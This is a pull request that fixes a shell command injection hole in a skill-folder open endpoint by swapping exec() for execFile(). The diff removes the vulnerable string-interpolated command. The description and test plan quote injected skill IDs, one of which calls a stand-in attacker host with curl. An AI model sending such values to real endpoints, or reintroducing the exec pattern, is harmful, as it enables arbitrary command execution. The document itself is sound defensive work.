### PR TITLE
fix: prevent command injection in skill open endpoint

### DIFF
--- a/src/api/server.ts
+++ b/src/api/server.ts
@@ -2634,14 +2634,14 @@ async function handleRequest(
       return;
     }
 
-    const { exec } = await import("node:child_process");
-    const cmd =
+    const { execFile } = await import("node:child_process");
+    const opener =
       process.platform === "darwin"
-        ? `open "${skillPath}"`
+        ? "open"
         : process.platform === "win32"
-          ? `explorer "${skillPath}"`
-          : `xdg-open "${skillPath}"`;
-    exec(cmd, (err) => {
+          ? "explorer"
+          : "xdg-open";
+    execFile(opener, [skillPath], (err) => {
       if (err)
         logger.warn(
           `[milaidy-api] Failed to open skill folder: ${err.message}`,


### PR DESCRIPTION
## Summary

- Replace `child_process.exec()` with `execFile()` in `POST /api/skills/:id/open` to prevent shell command injection via crafted skill IDs
- `exec()` passes commands through a shell which evaluates metacharacters (`$()`, backticks), while `execFile()` invokes the binary directly with an argv array, making injection impossible
- The endpoint extracts `skillId` from the URL path and interpolates it into a shell command string — a malicious skill ID like `$(curl attacker.com)` would execute arbitrary commands

## Test plan

- [ ] Verify `POST /api/skills/valid-skill/open` still opens the folder correctly on macOS/Linux/Windows
- [ ] Verify `POST /api/skills/$(whoami)/open` returns 404 without executing the injected command
- [ ] Verify `POST /api/skills/` + backtick-injected ID returns 404 without execution
